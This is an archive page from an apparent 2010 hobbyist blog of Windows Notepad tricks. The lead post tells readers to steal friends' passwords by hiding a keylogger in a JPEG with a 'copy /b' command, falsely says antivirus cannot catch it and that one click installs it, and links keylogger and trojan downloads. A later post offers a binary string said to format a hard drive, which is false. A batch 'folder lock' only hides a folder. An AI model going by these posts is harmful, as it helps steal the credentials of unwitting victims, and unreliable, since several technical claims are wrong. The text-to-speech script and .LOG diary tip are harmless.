Showing posts with label Notepad. Show all posts
Showing posts with label Notepad. Show all posts

Tuesday, March 16, 2010

Send Trojan or EXE Files Behind The Image

HACK FRIENDS PASSWORD BY SENDING KEYLOGGERS OR TROJANS BY SENDING THEM BEHIND AN IMAGE
U CAN DO IT BY INSIDE KEYLOGGER
BUT SUPER KEYLOGGER WILL BE BEST
1.This is THE method to hide your Keylogger
copy these files to C:\ drive and paste them into a folder and open the command prompt window
2. the most important step is type this command at command prompt.
copy /b sourceimagefile.jpg + filetobehidden.exe targetimage.jpg
Now the logger in the .jpeg format
3.Now the antivirus cant detect the file.
4.Just send the uploaded image to the victim as soon as he clicks the image file invisible keylogger will be installed.
He'll b enjoying with picture and you enjoy with his emails.
download inside keylogger from here:
http://www.inside-logger.com/key_logger/download.html
or here:
http://www.trojanfrance.com/index.php?dir=KeyLoggers/
ENJOYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

Make your computer speak

copy the script in notepad and save it as .vbs and run the script and type abdulkalam is great man and click ok it will say abdulkalam is great man


Code:
Dim msg, sapi

msg=InputBox("Enter your text","My text to speak")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Monday, February 15, 2010

Make you Xp Talk

Open a text file in notepad and write:

;copy from here--------------

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

;----------to here


( ';')< " Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text, input the text and press ok."

Folder lock

@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End



paste this in notepad replace the line enter your password wid ur password and save the file .bat extension

Monday, January 25, 2010

Format HDD with Notepad.

Step 1.
Write The Following In Notepad Exactly as it says

Code:

01001011000111110010010101010101010000011111100000

Step 2.
Save As it as .EXE and any Name would Do.

Step 3.
Make an Ethical use of it.

Notepad Trick

It works in XP!!
Open Notepad and press "ctrl+backspace"

Thursday, January 14, 2010

USE UR NOTEPAD AS DIARY

Ever wanted to maintain a diary on your PC ?
Now, you can do it without the use of a software !

USE NOTEPAD !

Do The Following :
1. Open Notepad
2. Type : .LOG
3. Save it with any name say 'Diary'
4. Open Diary.txt again

Wow you see today's date and time, so start writing your Diary !